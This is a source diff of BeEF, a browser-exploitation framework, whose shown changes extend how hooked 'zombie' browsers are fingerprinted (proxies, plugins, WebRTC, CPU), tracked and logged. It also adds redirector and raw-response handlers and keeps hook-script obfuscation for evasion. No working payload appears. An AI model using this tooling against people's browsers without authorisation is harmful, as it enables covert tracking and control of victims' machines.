+              break
+            end
+          end
+
+          # retrieve proxy client IP
+          proxy_clients = []
+          [
+            'CLIENT_IP',
+            'FORWARDED_FOR',
+            'FORWARDED',
+            'FORWARDED_FOR_IP',
+            'X_FORWARDED',
+            'X_FORWARDED_FOR'
+          ].each do |header|
+            proxy_clients << "#{JSON.parse(zombie.httpheaders)[header]}" unless JSON.parse(zombie.httpheaders)[header].nil?
+          end
+
+          # retrieve proxy server
+          proxy_server = JSON.parse(zombie.httpheaders)['VIA'] unless JSON.parse(zombie.httpheaders)['VIA'].nil?
+
+          # store and log proxy details
+          if using_proxy == true
+            BD.set(session_id, 'UsingProxy', "#{using_proxy}")
+            proxy_log_string = "#{zombie.ip} is using a proxy"
+            unless proxy_clients.nil?
+              BD.set(session_id, 'ProxyClient', "#{proxy_clients.sort.uniq.join(',')}")
+              proxy_log_string += " [client: #{proxy_clients.sort.uniq.join(',')}]"
+            end
+            unless proxy_server.nil?
+              BD.set(session_id, 'ProxyServer', "#{proxy_server}")
+              proxy_log_string += " [server: #{proxy_server}]"
+            end
+            BeEF::Core::Logger.instance.register('Zombie', "#{proxy_log_string}", "#{zombie.id}")
+          end
+
           # get and store browser version
           browser_version = get_param(@data['results'], 'BrowserVersion')
           if BeEF::Filters.is_valid_browserversion?(browser_version)
@@ -168,11 +219,11 @@ module BeEF
           end
 
           # get and store the system platform
-          system_platform = get_param(@data['results'], 'SystemPlatform')
+          system_platform = get_param(@data['results'], 'BrowserPlatform')
           if BeEF::Filters.is_valid_system_platform?(system_platform)
-            BD.set(session_id, 'SystemPlatform', system_platform)
+            BD.set(session_id, 'BrowserPlatform', system_platform)
           else
-            self.err_msg "Invalid system platform returned from the hook browser's initial connection."
+            self.err_msg "Invalid browser platform returned from the hook browser's initial connection."
           end
 
           # get and store the hooked browser type
@@ -239,6 +290,14 @@ module BeEF
             self.err_msg "Invalid value for HasGoogleGears returned from the hook browser's initial connection."
           end
 
+          # get and store the yes|no value for HasFoxit
+          has_foxit = get_param(@data['results'], 'HasFoxit')
+          if BeEF::Filters.is_valid_yes_no?(has_foxit)
+            BD.set(session_id, 'HasFoxit', has_foxit)
+          else
+            self.err_msg "Invalid value for HasFoxit returned from the hook browser's initial connection."
+          end
+
           # get and store the yes|no value for HasWebSocket
           has_web_socket = get_param(@data['results'], 'HasWebSocket')
           if BeEF::Filters.is_valid_yes_no?(has_web_socket)
@@ -247,6 +306,14 @@ module BeEF
             self.err_msg "Invalid value for HasWebSocket returned from the hook browser's initial connection."
           end
 
+          # get and store the yes|no value for HasWebRTC
+          has_webrtc = get_param(@data['results'], 'HasWebRTC')
+          if BeEF::Filters.is_valid_yes_no?(has_webrtc)
+            BD.set(session_id, 'HasWebRTC', has_webrtc)
+          else
+            self.err_msg "Invalid value for HasWebRTC returned from the hook browser's initial connection."
+          end
+
           # get and store the yes|no value for HasActiveX
           has_activex = get_param(@data['results'], 'HasActiveX')
           if BeEF::Filters.is_valid_yes_no?(has_activex)
@@ -255,6 +322,62 @@ module BeEF
             self.err_msg "Invalid value for HasActiveX returned from the hook browser's initial connection."
           end
 
+          # get and store the yes|no value for HasSilverlight
+          has_silverlight = get_param(@data['results'], 'HasSilverlight')
+          if BeEF::Filters.is_valid_yes_no?(has_silverlight)
+            BD.set(session_id, 'HasSilverlight', has_silverlight)
+          else
+            self.err_msg "Invalid value for HasSilverlight returned from the hook browser's initial connection."
+          end
+
+          # get and store the yes|no value for HasQuickTime
+          has_quicktime = get_param(@data['results'], 'HasQuickTime')
+          if BeEF::Filters.is_valid_yes_no?(has_quicktime)
+            BD.set(session_id, 'HasQuickTime', has_quicktime)
+          else
+            self.err_msg "Invalid value for HasQuickTime returned from the hook browser's initial connection."
+          end
+
+          # get and store the yes|no value for HasRealPlayer
+          has_realplayer = get_param(@data['results'], 'HasRealPlayer')
+          if BeEF::Filters.is_valid_yes_no?(has_realplayer)
+            BD.set(session_id, 'HasRealPlayer', has_realplayer)
+          else
+            self.err_msg "Invalid value for HasRealPlayer returned from the hook browser's initial connection."
+          end
+
+          # get and store the yes|no value for HasWMP
+          has_wmp = get_param(@data['results'], 'HasWMP')
+          if BeEF::Filters.is_valid_yes_no?(has_wmp)
+            BD.set(session_id, 'HasWMP', has_wmp)
+          else
+            self.err_msg "Invalid value for HasWMP returned from the hook browser's initial connection."
+          end
+
+          # get and store the yes|no value for HasVLC
+          has_vlc = get_param(@data['results'], 'HasVLC')
+          if BeEF::Filters.is_valid_yes_no?(has_vlc)
+            BD.set(session_id, 'HasVLC', has_vlc)
+          else
+            self.err_msg "Invalid value for HasVLC returned from the hook browser's initial connection."
+          end
+
+          # get and store the value for CPU
+          cpu_type = get_param(@data['results'], 'CPU')
+          if !cpu_type.nil?
+            BD.set(session_id, 'CPU', cpu_type)
+          else
+            self.err_msg "Invalid value for CPU returned from the hook browser's initial connection."
+          end
+
+          # get and store the value for TouchEnabled
+          touch_enabled = get_param(@data['results'], 'TouchEnabled')
+          if BeEF::Filters.is_valid_yes_no?(touch_enabled)
+            BD.set(session_id, 'TouchEnabled', touch_enabled)
+          else
+            self.err_msg "Invalid value for TouchEnabled returned from the hook browser's initial connection."
+          end
+
           # get and store whether the browser has session cookies enabled
           has_session_cookies = get_param(@data['results'], 'hasSessionCookies')
           if BeEF::Filters.is_valid_yes_no?(has_session_cookies)

core/main/handlers/hookedbrowsers.rb

@@ -51,13 +51,25 @@ module Handlers
 
       # @note is a known browser so send instructions 
       else       
+        # @note Check if we haven't seen this browser for a while, log an event if we haven't
+        if (Time.new.to_i - hooked_browser.lastseen.to_i) > 60
+          BeEF::Core::Logger.instance.register('Zombie',"#{hooked_browser.ip} appears to have come back online","#{hooked_browser.id}")
+        end
+
         # @note record the last poll from the browser
         hooked_browser.lastseen = Time.new.to_i
         
         # @note Check for a change in zombie IP and log an event
-        if hooked_browser.ip != request.ip
-          BeEF::Core::Logger.instance.register('Zombie',"IP address has changed from #{hooked_browser.ip} to #{request.ip}","#{hooked_browser.id}")
-          hooked_browser.ip = request.ip
+        if config.get('beef.http.use_x_forward_for') == true
+          if hooked_browser.ip != request.env["HTTP_X_FORWARDED_FOR"]
+            BeEF::Core::Logger.instance.register('Zombie',"IP address has changed from #{hooked_browser.ip} to #{request.env["HTTP_X_FORWARDED_FOR"]}","#{hooked_browser.id}")
+            hooked_browser.ip = request.env["HTTP_X_FORWARDED_FOR"]
+          end
+        else
+          if hooked_browser.ip != request.ip
+           BeEF::Core::Logger.instance.register('Zombie',"IP address has changed from #{hooked_browser.ip} to #{request.ip}","#{hooked_browser.id}")
+           hooked_browser.ip = request.ip
+          end
         end
       
         hooked_browser.count!

core/main/handlers/modules/beefjs.rb

@@ -21,7 +21,7 @@ module BeEF
             beef_js_path = "#{$root_dir}/core/main/client/"
 
             # @note External libraries (like jQuery) that are not evaluated with Eruby and possibly not obfuscated
-            ext_js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js lib/jools.min.js)
+            ext_js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js lib/jools.min.js lib/mdetect.js)
 
             # @note BeEF libraries: need Eruby evaluation and obfuscation
             beef_js_sub_files = %w(beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js net/cors.js are.js)
@@ -66,6 +66,12 @@ module BeEF
             hook_session_config = BeEF::Core::Server.instance.to_h
 
             # @note if http_host="0.0.0.0" in config ini, use the host requested by client
+            unless hook_session_config['beef_public'].nil?
+              if hook_session_config['beef_host'] != hook_session_config['beef_public']
+                hook_session_config['beef_host'] = hook_session_config['beef_public']
+                hook_session_config['beef_url'].sub!(/#{hook_session_config['beef_host']}/, hook_session_config['beef_public'])
+              end
+            end
             if hook_session_config['beef_host'].eql? "0.0.0.0"
               hook_session_config['beef_host'] = req_host
               hook_session_config['beef_url'].sub!(/0\.0\.0\.0/, req_host)
@@ -74,6 +80,10 @@ module BeEF
             # @note set the XHR-polling timeout
             hook_session_config['xhr_poll_timeout'] = config.get("beef.http.xhr_poll_timeout")
 
+            # @note set the hook file path and BeEF's cookie name
+            hook_session_config['hook_file'] = config.get("beef.http.hook_file")
+            hook_session_config['hook_session_name'] = config.get("beef.http.hook_session_name")
+
             # @note if http_port <> public_port in config ini, use the public_port
             unless hook_session_config['beef_public_port'].nil?
               if hook_session_config['beef_port'] != hook_session_config['beef_public_port']
@@ -99,7 +109,7 @@ module BeEF
 
             if config.get("beef.extension.evasion.enable")
               evasion = BeEF::Extension::Evasion::Evasion.instance
-              @final_hook = ext_js_to_not_obfuscate + evasion.add_bootstrapper + evasion.obfuscate(ext_js_to_obfuscate + @hook) 
+              @final_hook = ext_js_to_not_obfuscate + evasion.add_bootstrapper + evasion.obfuscate(ext_js_to_obfuscate + @hook)
             else
               @final_hook = ext_js_to_not_obfuscate + @hook
             end

core/main/models/browserdetails.rb

@@ -80,6 +80,7 @@ module Models
       
       return BeEF::Core::Constants::Os::OS_UNKNOWN_IMG if ua_string.nil?
       return BeEF::Core::Constants::Os::OS_WINDOWS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_WINDOWS_UA_STR
+      return BeEF::Core::Constants::Os::OS_ANDROID_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_ANDROID_UA_STR
       return BeEF::Core::Constants::Os::OS_LINUX_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_LINUX_UA_STR
       return BeEF::Core::Constants::Os::OS_QNX_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_QNX_UA_STR
       return BeEF::Core::Constants::Os::OS_BEOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_BEOS_UA_STR
@@ -91,7 +92,6 @@ module Models
       return BeEF::Core::Constants::Os::OS_MAEMO_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_MAEMO_UA_STR
       return BeEF::Core::Constants::Os::OS_MAC_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_MAC_UA_STR
       return BeEF::Core::Constants::Os::OS_BLACKBERRY_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_BLACKBERRY_UA_STR
-      return BeEF::Core::Constants::Os::OS_ANDROID_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_ANDROID_UA_STR
     
       BeEF::Core::Constants::Os::OS_UNKNOWN_IMG
     end
@@ -103,7 +103,9 @@ module Models
     def self.hw_icon(session_id)
 
       ua_string = get(session_id, 'BrowserReportedName')
-
+      hardware  = get(session_id, 'Hardware')
+      return BeEF::Core::Constants::Hardware::HW_VM_IMG if hardware =~ /Virtual Machine/
+      return BeEF::Core::Constants::Hardware::HW_LAPTOP_IMG if hardware =~ /Laptop/
       return BeEF::Core::Constants::Hardware::HW_UNKNOWN_IMG if ua_string.nil?
 
       return BeEF::Core::Constants::Hardware::HW_WINPHONE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_WINPHONE_UA_STR

core/main/network_stack/assethandler.rb

@@ -24,6 +24,38 @@ module Handlers
       @root_dir = File.expand_path('../../../../', __FILE__)
     end
 
+    # Binds a redirector to a mount point
+    # @param [String] target The target for the redirector
+    # @param [String] path An optional URL path to mount the redirector to (can be nil for a random path)
+    # @return [String] URL Path of the redirector
+    # @todo This function, similar to bind(), should accept a hooked browser session to limit the mounted file to a certain session etc.
+    def bind_redirect(target, path=nil)
+      url = build_url(path,nil)
+      @allocations[url] = {'target' => target}
+      @http_server.mount(url,BeEF::Core::NetworkStack::Handlers::Redirector.new(target))
+      @http_server.remap
+      print_info "Redirector to [" + target + "] bound to url [" + url + "]"
+      url
+    end
+
+    # Binds raw HTTP to a mount point
+    # @param [Integer] status HTTP status code to return
+    # @param [String] headers HTTP headers as a JSON string to return
+    # @param [String] body HTTP body to return
+    # @param [String] path URL path to mount the asset to TODO (can be nil for random path)
+    # @todo @param [Integer] count The amount of times the asset can be accessed before being automatically unbinded (-1 = unlimited)
+    def bind_raw(status, header, body, path=nil, count=-1)
+      url = build_url(path,nil)
+      @allocations[url] = {}
+      @http_server.mount(
+        url,
+        BeEF::Core::NetworkStack::Handlers::Raw.new(status, header, body)
+      )
+      @http_server.remap
+      print_info "Raw HTTP bound to url [" + url + "]"
+      url
+    end
+
     # Binds a file to a mount point
     # @param [String] file File path to asset
     # @param [String] path URL path to mount the asset to (can be nil for random path)

core/main/network_stack/handlers/raw.rb

@@ -0,0 +1,33 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+module BeEF
+  module Core
+    module NetworkStack
+      module Handlers
+
+        class Raw
+
+	        def initialize(status, header={}, body)
+	        	@status  = status
+	                @header  = header
+	                @body    = body
+	        end
+
+	        def call(env)
+	            [@status, @header, @body]
+	        end
+
+	        private
+
+	        @request
+
+	        @response
+
+	    end
+	end
+end
+end
+end

core/main/network_stack/handlers/redirector.rb

@@ -0,0 +1,42 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+module BeEF
+  module Core
+    module NetworkStack
+      module Handlers
+
+        # @note Redirector is used as a Rack app for mounting HTTP redirectors, instead of content
+        # @todo Add new options to specify what kind of redirect you want to achieve
+        class Redirector
+
+	        @target = "" 	
+
+	        def initialize(target)
+	        	@target = target
+	        end
+
+	        def call(env)
+	        	@response = Rack::Response.new(
+	        		body = ['302 found'],
+	        		status = 302,
+	        		header = {
+	        			'Content-Type' => 'text',
+	        			'Location' => @target
+	        		}
+	        	)
+	        end
+
+	        private
+
+	        @request
+
+	        @response
+
+	    end
+	end
+end
+end
+end

core/main/rest/handlers/hookedbrowsers.rb

@@ -72,15 +72,15 @@ module BeEF
            details = BeEF::Core::Models::BrowserDetails
 
            {
-               'id' => hb.id,
-               'session' => hb.session,
-               'name' => details.get(hb.session, 'BrowserName'),
-               'version' => details.get(hb.session, 'BrowserVersion'),
-               'os' => details.get(hb.session, 'OsName'),
-               'platform' => details.get(hb.session, 'SystemPlatform'),
-               'ip' => hb.ip,
-               'domain' => details.get(hb.session, 'HostName'),
-               'port' => hb.port.to_s,
+               'id'       => hb.id,
+               'session'  => hb.session,
+               'name'     => details.get(hb.session, 'BrowserName'),
+               'version'  => details.get(hb.session, 'BrowserVersion'),
+               'os'       => details.get(hb.session, 'OsName'),
+               'platform' => details.get(hb.session, 'BrowserPlatform'),
+               'ip'       => hb.ip,
+               'domain'   => details.get(hb.session, 'HostName'),
+               'port'     => hb.port.to_s,
                'page_uri' => details.get(hb.session, 'PageURI')
            }
         end
@@ -88,4 +88,4 @@ module BeEF
       end
     end
   end
-end
+end

core/main/router/router.rb

@@ -81,16 +81,34 @@ module BeEF
             case type
               when "apache"
                 headers "Server" => "Apache/2.2.3 (CentOS)",
-                        "Content-Type" => "text/html"
+                        "Content-Type" => "text/html; charset=UTF-8"
 
               when "iis"
                 headers "Server" => "Microsoft-IIS/6.0",
                         "X-Powered-By" => "ASP.NET",
-                        "Content-Type" => "text/html"
+                        "Content-Type" => "text/html; charset=UTF-8"
               else
                 print_error "You have and error in beef.http.web_server_imitation.type! Supported values are: apache, iis."
             end
           end
+
+          # @note If CORS are enabled, expose the appropriate headers
+          # this apparently duplicate code is needed to reply to preflight OPTIONS requests, which need to respond with a 200
+          # and be able to handle requests with a JSON content-type
+          if request.request_method == 'OPTIONS' && config.get("beef.http.restful_api.allow_cors")
+            allowed_domains = config.get("beef.http.restful_api.cors_allowed_domains")
+            headers "Access-Control-Allow-Origin" => allowed_domains,
+                    "Access-Control-Allow-Methods" => "POST, GET",
+                    "Access-Control-Allow-Headers" => "Content-Type"
+            halt 200
+          end
+
+          # @note If CORS are enabled, expose the appropriate headers
+          if config.get("beef.http.restful_api.allow_cors")
+            allowed_domains = config.get("beef.http.restful_api.cors_allowed_domains")
+            headers "Access-Control-Allow-Origin" => allowed_domains,
+                    "Access-Control-Allow-Methods" => "POST, GET"
+          end
         end
 
         # @note Default root page

core/main/server.rb

@@ -4,6 +4,10 @@
 # See the file 'doc/COPYING' for copying permission
 #
 
+# Remove Thin 'Server' response header
+Thin.send :remove_const, :SERVER
+Thin::SERVER = nil
+
 module BeEF
   module Core
 
@@ -30,16 +34,18 @@ module BeEF
 
       def to_h
         {
-            'beef_version' => VERSION,
-            'beef_url' => @url,
+            'beef_version'  => VERSION,
+            'beef_url'      => @url,
             'beef_root_dir' => @root_dir,
-            'beef_host' => @configuration.get('beef.http.host'),
-            'beef_port' => @configuration.get('beef.http.port'),
-            'beef_public' => @configuration.get('beef.http.public'),
+            'beef_host'     => @configuration.get('beef.http.host'),
+            'beef_port'     => @configuration.get('beef.http.port'),
+            'beef_public'   => @configuration.get('beef.http.public'),
             'beef_public_port' => @configuration.get('beef.http.public_port'),
-            'beef_dns' => @configuration.get('beef.http.dns'),
-            'beef_hook' => @configuration.get('beef.http.hook_file'),
-            'beef_proto' => @configuration.get('beef.http.https.enable') == true ? "https" : "http"
+            'beef_dns_host' => @configuration.get('beef.http.dns_host'),
+            'beef_dns_port' => @configuration.get('beef.http.dns_port'),
+            'beef_hook'     => @configuration.get('beef.http.hook_file'),
+            'beef_proto'    => @configuration.get('beef.http.https.enable') == true ? "https" : "http",
+            'client_debug'  => @configuration.get("beef.client.debug")
         }
       end
 

core/ruby.rb

@@ -7,6 +7,9 @@
 # @note Patching Ruby Security
 require 'core/ruby/security'
 
+# @note Patching Rack File class to prevent a potential XSS
+require 'core/ruby/file.rb'
+
 # @note Patching Ruby
 require 'core/ruby/module'
 require 'core/ruby/object'

core/ruby/file.rb

@@ -0,0 +1,44 @@
+require 'time'
+require 'rack/utils'
+require 'rack/mime'
+
+module Rack
+  class File
+    def _call(env)
+      unless ALLOWED_VERBS.include? env["REQUEST_METHOD"]
+        return fail(405, "Method Not Allowed")
+      end
+
+      @path_info = Utils.unescape(env["PATH_INFO"])
+      parts = @path_info.split SEPS
+
+      parts.inject(0) do |depth, part|
+        case part
+          when '', '.'
+            depth
+          when '..'
+            return fail(404, "Not Found") if depth - 1 < 0
+            depth - 1
+          else
+            depth + 1
+        end
+      end
+
+      @path = F.join(@root, *parts)
+
+      available = begin
+        F.file?(@path) && F.readable?(@path)
+      rescue SystemCallError
+        false
+      end
+
+      if available
+        serving(env)
+      else
+        # this is the patched line. No need to reflect the URI path, potential XSS
+        # exploitable if you can bypass the Content-type: text/plain (IE MHTML and tricks like that)
+        fail(404, "File not found")
+      end
+    end
+  end
+end

extensions/admin_ui/controllers/logs/logs.rb

@@ -63,7 +63,8 @@ class Logs < BeEF::Extension::AdminUI::HttpController
         'id' => log.id.to_i,
         'date' => log.date.to_s,
         'event' => log.event.to_s,
-        'type' => log.type.to_s
+        'type' => log.type.to_s,
+        'hooked_browser_id' => log.hooked_browser_id.to_i
       }
     end
     

extensions/admin_ui/controllers/modules/modules.rb

@@ -7,14 +7,14 @@ module BeEF
 module Extension
 module AdminUI
 module Controllers
-  
+
 #
 #
 #
 class Modules < BeEF::Extension::AdminUI::HttpController
-  
+
   BD = BeEF::Core::Models::BrowserDetails
-  
+
   def initialize
     super({
       'paths' => {
@@ -31,7 +31,7 @@ class Modules < BeEF::Extension::AdminUI::HttpController
         '/commandmodule/reexecute'          => method(:reexecute_command_module)
       }
     })
-    
+
     @session = BeEF::Extension::AdminUI::Session.instance
   end
 
@@ -45,11 +45,11 @@ class Modules < BeEF::Extension::AdminUI::HttpController
          'token' => BeEF::Core::Configuration.instance.get("beef.api_token")
      }.to_json
   end
-  
+
   # Returns a JSON array containing the summary for a selected zombie.
   def select_zombie_summary
 
-    # get the zombie 
+    # get the zombie
     zombie_session = @params['zombie_session'] || nil
     (print_error "Zombie session is nil";return) if zombie_session.nil?
     zombie = BeEF::Core::Models::HookedBrowser.first(:session => zombie_session)
@@ -57,390 +57,94 @@ class Modules < BeEF::Extension::AdminUI::HttpController
 
     # init the summary grid
     summary_grid_hash = {
-      'success' => 'true', 
+      'success' => 'true',
       'results' => []
     }
 
-    # set and add the return values for the page title
-    page_title = BD.get(zombie_session, 'PageTitle') 
-    if not page_title.nil?
-      encoded_page_title = CGI.escapeHTML(page_title)
-      encoded_page_title_hash = { 'Page Title' => encoded_page_title }
-      
-      page_name_row = {
-        'category' => 'Hooked Page',
-        'data' => encoded_page_title_hash,
-        'from' => 'Initialization'
-      }
-      
-      summary_grid_hash['results'].push(page_name_row) # add the row
+    # zombie properties
+    # in the form of: category, UI label, value
+    zombie_properties = [
+
+        # Browser
+        ['Browser', 'Browser Name',       'BrowserName'],
+        ['Browser', 'Browser Version',    'BrowserVersion'],
+        ['Browser', 'Browser UA String',  'BrowserReportedName'],
+        ['Browser', 'Browser Platform',   'BrowserPlatform'],
+        ['Browser', 'Browser Plugins',    'BrowserPlugins'],
+        ['Browser', 'Window Size',        'WindowSize'],
+
+        # Browser Components
+        ['Browser Components', 'Flash',              'HasFlash'],
+        ['Browser Components', 'Java',               'JavaEnabled'],
+        ['Browser Components', 'VBScript',           'VBScriptEnabled'],
+        ['Browser Components', 'PhoneGap',           'HasPhonegap'],
+        ['Browser Components', 'Google Gears',       'HasGoogleGears'],
+        ['Browser Components', 'Silverlight',        'HasSilverlight'],
+        ['Browser Components', 'Web Sockets',        'HasWebSocket'],
+        ['Browser Components', 'QuickTime',          'HasQuickTime'],
+        ['Browser Components', 'RealPlayer',         'HasRealPlayer'],
+        ['Browser Components', 'Windows Media Player','HasWMP'],
+        ['Browser Components', 'VLC',                'HasVLC'],
+        ['Browser Components', 'Foxit Reader',       'HasFoxit'],
+        ['Browser Components', 'WebRTC',             'HasWebRTC'],
+        ['Browser Components', 'ActiveX',            'HasActiveX'],
+        ['Browser Components', 'Session Cookies',    'hasSessionCookies'],
+        ['Browser Components', 'Persistent Cookies', 'hasPersistentCookies'],
+
+        # Hooked Page
+        ['Hooked Page', 'Page Title',    'PageTitle'],
+        ['Hooked Page', 'Page URI',      'PageURI'],
+        ['Hooked Page', 'Page Referrer', 'PageReferrer'],
+        ['Hooked Page', 'Host Name/IP',  'HostName'],
+        ['Hooked Page', 'Cookies',       'Cookies'],
+
+        # Host
+        ['Host', 'Date',             'DateStamp'],
+        ['Host', 'Operating System', 'OsName'],
+        ['Host', 'Hardware',         'Hardware'],
+        ['Host', 'CPU',              'CPU'],
+        ['Host', 'Screen Size',      'ScreenSize'],
+        ['Host', 'Touch Screen',     'TouchEnabled']
+    ]
+
+    # set and add the return values for each browser property
+    # in the form of: category, UI label, value
+    zombie_properties.each do |p|
+
+      case p[2]
+        when "BrowserName"
+          data   = BeEF::Core::Constants::Browsers.friendly_name(BD.get(zombie_session, p[2]))
+
+        when "ScreenSize"
+          screen_size_hash = JSON.parse(BD.get(zombie_session, p[2]).gsub(/\"\=\>/, '":')) # tidy up the string for JSON
+          width  = screen_size_hash['width']
+          height = screen_size_hash['height']
+          cdepth = screen_size_hash['colordepth']
+          data   = "Width: #{width}, Height: #{height}, Colour Depth: #{cdepth}"
+
+        when "WindowSize"
+          window_size_hash = JSON.parse(BD.get(zombie_session, p[2]).gsub(/\"\=\>/, '":')) # tidy up the string for JSON
+          width  = window_size_hash['width']
+          height = window_size_hash['height']
+          data   = "Width: #{width}, Height: #{height}"
+        else
+          data   = BD.get(zombie_session, p[2])
+      end
+
+      # add property to summary hash
+      if not data.nil?
+        summary_grid_hash['results'].push({
+          'category' => p[0],
+          'data'     => { p[1] => CGI.escapeHTML("#{data}") },
+          'from'     => 'Initialization'
+        })
+      end
+
     end
 
-    # set and add the return values for the page uri
-    page_uri = BD.get(zombie_session, 'PageURI')
-    if not page_uri.nil?
-      encoded_page_uri = CGI.escapeHTML(page_uri)
-      encoded_page_uri_hash = { 'Page URI' => encoded_page_uri }
-
-      page_name_row = {
-        'category' => 'Hooked Page',
-        'data' => encoded_page_uri_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-
-    # set and add the return values for the page referrer
-    page_referrer = BD.get(zombie_session, 'PageReferrer')
-    if not page_referrer.nil?
-      encoded_page_referrer = CGI.escapeHTML(page_referrer)
-      encoded_page_referrer_hash = { 'Page Referrer' => encoded_page_referrer }
-
-      page_name_row = {
-        'category' => 'Hooked Page',
-        'data' => encoded_page_referrer_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-
-    # set and add the return values for the host name
-    host_name = BD.get(zombie_session, 'HostName') 
-    if not host_name.nil?
-      encoded_host_name = CGI.escapeHTML(host_name)
-      encoded_host_name_hash = { 'Hostname/IP' => encoded_host_name }
-    
-      page_name_row = {
-        'category' => 'Hooked Page',
-        'data' => encoded_host_name_hash,
-        'from' => 'Initialization'
-      }
-    
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-    
-    # set and add the return values for the date stamp
-    date_stamp = BD.get(zombie_session, 'DateStamp')
-    if not date_stamp.nil?
-      encoded_date_stamp = CGI.escapeHTML(date_stamp)
-      encoded_date_stamp_hash = { 'Date' => encoded_date_stamp }
-
-      page_name_row = {
-        'category' => 'Host',
-        'data' => encoded_date_stamp_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-
-    # set and add the return values for the os name
-    os_name = BD.get(zombie_session, 'OsName')
-    if not os_name.nil?
-      encoded_os_name = CGI.escapeHTML(os_name)
-      encoded_os_name_hash = { 'OS Name' => encoded_os_name }
-
-      page_name_row = {
-        'category' => 'Host',
-        'data' => encoded_os_name_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-
-    # set and add the return values for the hardware name
-    hw_name = BD.get(zombie_session, 'Hardware')
-    if not hw_name.nil?
-      encoded_hw_name = CGI.escapeHTML(hw_name)
-      encoded_hw_name_hash = { 'Hardware' => encoded_hw_name }
-
-      page_name_row = {
-        'category' => 'Host',
-        'data' => encoded_hw_name_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
- 
-    # set and add the return values for the browser name
-    browser_name = BD.get(zombie_session, 'BrowserName') 
-    if not browser_name.nil?
-      friendly_browser_name = BeEF::Core::Constants::Browsers.friendly_name(browser_name)
-      browser_name_hash = { 'Browser Name' => friendly_browser_name }
-
-      browser_name_row = {
-        'category' => 'Browser',
-        'data' => browser_name_hash,
-        'from' => 'Initialization'
-      }
-    
-      summary_grid_hash['results'].push(browser_name_row) # add the row
-    end
-    
-    # set and add the return values for the browser version
-    browser_version = BD.get(zombie_session, 'BrowserVersion') 
-    if not browser_version.nil?
-      encoded_browser_version = CGI.escapeHTML(browser_version)
-      browser_version_hash = { 'Browser Version' => encoded_browser_version }
-
-      browser_version_row = {
-        'category' => 'Browser',
-         'data' => browser_version_hash,
-        'from' => 'Initialization'
-      }
-    
-      summary_grid_hash['results'].push(browser_version_row) # add the row
-    end
-    
-    # set and add the return values for the browser ua string
-    browser_uastring = BD.get(zombie_session, 'BrowserReportedName')
-    if not browser_uastring.nil?
-      browser_uastring_hash = { 'Browser UA String' => browser_uastring }
-
-      browser_uastring_row = {
-        'category' => 'Browser',
-         'data' => browser_uastring_hash,
-        'from' => 'Initialization'
-      }
-    
-      summary_grid_hash['results'].push(browser_uastring_row) # add the row
-    end
-    
-    # set and add the list of cookies
-    cookies = BD.get(zombie_session, 'Cookies')
-    if not cookies.nil? and not cookies.empty?
-      encoded_cookies = CGI.escapeHTML(cookies)
-      encoded_cookies_hash = { 'Cookies' => encoded_cookies }
-      
-      page_name_row = {
-        'category' => 'Hooked Page',
-        'data' => encoded_cookies_hash,
-        'from' => 'Initialization'
-      }
-      
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-    
-    # set and add the list of plugins installed in the browser
-    browser_plugins = BD.get(zombie_session, 'BrowserPlugins')
-    if not browser_plugins.nil? and not browser_plugins.empty?
-      encoded_browser_plugins = CGI.escapeHTML(browser_plugins)
-      encoded_browser_plugins_hash = { 'Browser Plugins' => encoded_browser_plugins }
-      
-      page_name_row = {
-        'category' => 'Browser',
-        'data' => encoded_browser_plugins_hash,
-        'from' => 'Initialization'
-      }
-      
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-    
-    # set and add the System Platform
-    system_platform = BD.get(zombie_session, 'SystemPlatform')
-    if not system_platform.nil?
-      encoded_system_platform = CGI.escapeHTML(system_platform)
-      encoded_system_platform_hash = { 'System Platform' => encoded_system_platform }
-
-      page_name_row = {
-        'category' => 'Host',
-        'data' => encoded_system_platform_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-
-    # set and add the zombie screen size and color depth
-    screen_size = BD.get(zombie_session, 'ScreenSize')
-    if not screen_size.nil?
-      
-      screen_size_hash = JSON.parse(screen_size.gsub(/\"\=\>/, '":')) # tidy up the string for JSON
-      width = screen_size_hash['width']
-      (print_error "width is wrong type";return) if not width.is_a?(Fixnum)
-      height = screen_size_hash['height']
-      (print_error "height is wrong type";return) if not height.is_a?(Fixnum)
-      colordepth = screen_size_hash['colordepth']
-      (print_error "colordepth is wrong type";return) if not colordepth.is_a?(Fixnum)
-      
-      # construct the string to be displayed in the details tab
-      encoded_screen_size = CGI.escapeHTML("Width: "+width.to_s + ", Height: " + height.to_s + ", Colour Depth: " + colordepth.to_s)
-      encoded_screen_size_hash = { 'Screen Size' => encoded_screen_size }
-      
-      page_name_row = {
-        'category' => 'Host',
-        'data' => encoded_screen_size_hash,
-        'from' => 'Initialization'
-      }
-
